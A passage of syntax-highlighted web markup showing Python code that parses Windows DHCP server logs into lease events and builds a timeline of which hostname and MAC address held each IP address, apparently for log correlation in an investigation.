32%)\">'Release'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'13'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'DNS_Update'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'14'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'DNS_Update_Failed'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'15'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'Lease_Expired'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'24'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'IP_Conflict'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'25'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'Lease_Deleted'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">def</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">parse_dhcp_logs</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">log_dir</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">    Parse all DhcpSrvLog-*.log files in directory.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">    Returns list of lease events sorted by timestamp.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">    \"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    events </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    log_files </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> glob</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">glob</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">os</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">path</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">join</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">log_dir</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'DhcpSrvLog-*.log'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> log_file </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> log_files</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">with</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">open</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">log_file</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'r'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> encoding</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'utf-8'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> errors</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'replace'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">as</span><span class=\"token plain\"> f</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> line </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> f</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                line </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> line</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">strip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Skip header lines and comments</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">not</span><span class=\"token plain\"> line </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">or</span><span class=\"token plain\"> line</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">startswith</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ID'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">or</span><span class=\"token plain\"> line</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">startswith</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'Microsoft'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">or</span><span class=\"token plain\"> \\</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                   line</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">startswith</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'Start'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">or</span><span class=\"token plain\"> line</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">startswith</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'Date'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">continue</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                parts </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> line</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">split</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">','</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">len</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">parts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">7</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">continue</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                event_id </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> parts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">strip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> event_id </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">not</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> DHCP_EVENT_TYPES</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">continue</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">try</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    date_str </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> parts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">1</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">strip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    time_str </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> parts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">2</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">strip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    timestamp </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> datetime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">strptime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">date_str</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">time_str</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"%m/%d/%y %H:%M:%S\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">except</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ValueError</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> IndexError</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">continue</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'timestamp'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\">   timestamp</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'event_type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\">  DHCP_EVENT_TYPES</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">event_id</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ip_address'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\">  parts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">4</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">strip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'hostname'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\">    parts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">5</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">strip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'mac_address'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> parts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">6</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">strip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">replace</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'-'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">':'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">upper</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'source_file'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> os</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">path</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">basename</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">log_file</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">return</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">sorted</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> key</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">lambda</span><span class=\"token plain\"> x</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> x</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'timestamp'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">def</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">build_ip_timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">    Build a timeline of which hostname held which IP at what time.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">    Essential for correlating IP addresses seen in other log sources.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">    \"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ip_timeline </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> defaultdict</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">list</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># ip -&gt; [(start_time, end_time, hostname, mac)]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    active_leases </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\">               </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># ip -&gt; (start_time, hostname, mac)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> event </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        ip </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> event</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ip_address'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        hostname </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> event</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'hostname'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        mac </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token 